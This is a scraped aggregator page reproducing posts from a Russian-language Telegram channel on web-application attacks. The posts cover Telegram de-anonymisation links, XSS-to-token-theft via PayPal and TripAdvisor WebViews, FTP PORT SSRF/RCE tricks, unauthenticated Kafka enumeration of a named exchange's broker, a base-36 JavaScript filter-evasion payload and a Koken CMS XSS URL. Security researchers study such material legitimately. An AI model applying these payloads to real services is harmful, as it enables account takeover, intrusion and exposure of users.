Получи случайную криптовалюту за регистрацию!

Кавычка

Логотип телеграм канала @webpwn — Кавычка К
Логотип телеграм канала @webpwn — Кавычка
Адрес канала: @webpwn
Категории: Технологии , Блоги
Язык: Русский
Количество подписчиков: 13.96K
Описание канала:

Практическая безопасность. Уязвимости и атаки на веб-приложения.
Платный канал, для тех, кому хочется побольше:
https://t.me/ k-umqRXUENFlYTBi

Рейтинги и Отзывы

2.50

2 отзыва

Оценить канал webpwn и оставить отзыв — могут только зарегестрированные пользователи. Все отзывы проходят модерацию.

5 звезд

0

4 звезд

1

3 звезд

0

2 звезд

0

1 звезд

1


Последние сообщения 2

2022-06-23 13:37:00 #osint #telegram

Чтобы узнать аккаунт в Telegram по его id, достаточно написать ссылку вида
t.me/@id45933

Где 45933 - интересующий нас айдишник. При переходе с мобильного клиента мы получим профиль с привязанным идентификатором.

Чтобы не добавлять к себе в контакты номер телефона, достаточно написать ссылку
t.me/+15109728359
Аналогично, при переходе по ссылке получим профиль с этим номером телефона и оригинальным именем.

>
5.7K viewsImpact, 10:37
Открыть/Комментировать
2022-06-21 13:36:59 #mobile #deeplink

Если вы нашли XSS на сайте, но у неё низкий impact — не удаётся "украсть" аккаунт жертвы или актив вне скоупа.
Вам стоит поискать мобильное приложение, которое содержит WebView функциональность и присваивает токен при открытии страницы.
Возьмём для примера приложение от PayPal.
Открыв его в декомпиляторе можно найти функцию около webview функциональности
boolean isSecureVenmoHostUrl(Uri uri)

Внутри неё обнаруживаем хосты
host.endsWith(".venmo.com") || host.equals("venmo.com") || host.endsWith(".venmo.biz")

Теперь нужно проверить возможно ли передать свой url в класс webview.

Если да, составляем полезную нагрузку: PoC Send

Это был пример как поднять xss, до чего-то существенного. При открытии ссылки, возможно украсть access_token и получить доступ к платежам пользователя.

Такая же функциональность в приложении TripAdvisor:

Pattern f30622a = Pattern.compile("^(?:https?\\:\\/\\/(?:[A-Za-z0-9_\\-]+\\.(dhcp(\\-[A-Za-z]+)?\\.([A-Za-z0-9_\\-]+\\.corp\\.)?|(nw\\.)?dev(\\-[A-Za-z]+)?\\.|cmc\\.|d\\.)?)?tripadvisor\\.(?:com|(?:[a-z]{2})|(?:(?:co|com)\\.[a-z]{2})))?\\/.*$");

В перечисленных случаях выше, разработчики исправляют только xss, поэтому вы всё ещё можете это воспроизвести.
4.9K viewsImpact, 10:36
Открыть/Комментировать
2022-06-16 13:37:06
А вот пример уязвимого кода для выполнения RCE через FTP.

Когда кто-то забирает файл, на контролируемом нами ресурсе, мы ему отдаем полезную нагрузку для эксплуатации выполнения кода (FastCGI, Redis, Zabbix).
После попытки сохранить его, мы отвечаем серверу, что переходим в пассивный режим, отправь содержимое на 127.0.0.1:9000 (или другой порт).

Это не только таск на CTF:
[1], [2]

>
6.4K viewsBo0oM, 10:37
Открыть/Комментировать
2022-06-15 13:37:01
В некоторых случаях доступ к FTP это еще и SSRF.

Плюсы: FTP тупой, как пробка
Минусы: Активный режим редко где включен.

После подключения с помощью netact, мы можем отправить файл (который мы залили) в произвольное место.

RETR file - готовит содержимое файла к отправке
PORT 1,2,3,4,5,6 - куда отправить содержимое, где первые 4 цифры это IP, а 2 последние это 5*256+6

Из примера выше, PORT 127,0,0,1,31,144 это 127.0.0.1:8080 (31*256+144).

>
4.0K viewsBo0oM, 10:37
Открыть/Комментировать
2022-06-12 11:55:30
Sometimes you can be a smart dude and report XSS. But maybe you were too hasty? Think about it.

http://koken.cms/preview.php?/albums/&preview=elementary/a:

#0day
6.1K viewscrlf, 08:55
Открыть/Комментировать
2022-06-09 13:37:06
Используем утилиты KaDeck или Offset Explorer для просмотра или изменения содержимого. Пример на скриншоте и выше - биржа okx.com.

Меняем циферки, пробуем эксплойт с log4j)

>
4.4K viewsBo0oM, 10:37
Открыть/Комментировать
2022-06-09 13:37:06 Запоминаем крутые порты 9092 (kafka), 2181 (zookeeper).

Видим подобное на хосте? Проверим, можно ли зайти без аутентификации.


kcat -b {IP}:9092 -u -L


В ответе будут адреса брокеров. Если брокер будет локальный, как ниже, то либо меняем в /etc/hosts временно localhost на нужный нам IP, либо пробрасываем локальный порт на нужную нам тачку.


Metadata for all topics (from broker -1: 103.210.236.192:9092/bootstrap):
1 brokers:
broker 0 at localhost:9092 (controller)
126 topics:
topic "LOGICAL_CONTRACT_MESSAGE_8962" with 1 partitions:
partition 0, leader 0, replicas: 0, isrs: 0
topic "traverser_klines_deals" with 1 partitions:
partition 0, leader 0, replicas: 0, isrs: 0
topic "LOGICAL_MESSAGE_8934" with 1 partitions:
partition 0, leader 0, replicas: 0, isrs: 0


>
4.4K viewsBo0oM, 10:37
Открыть/Комментировать
2022-06-07 13:37:01 Нажмите на кнопку ниже, чтобы получить платный доступ к «Кавычка за донаты».
5.3K viewsDonate, 10:37
Открыть/Комментировать
2022-05-25 14:28:12
Забавный способ уйти от систем защит - использовать другие системы счисления в #js для скрытия полезной нагрузки.

Например, функция parseInt может позволить перевести строку alert в числовое значение переведя значение в 36-ричную систему счисления:

> parseInt('alert', 36)
< 17795081

Чтобы выполнить, необходимо воспользоваться функцией toString и перевести число обратно в строку:

top[17795081..toString(36)]()

>
9.8K viewsBo0oM, 11:28
Открыть/Комментировать
2022-05-23 13:37:01 Уязвимости и атаки на CMS Bitrix

1.
Особенности
2. Уязвимости
3. Методы атак

Приятного чтения!
23.9K viewscrlf, 10:37
Открыть/Комментировать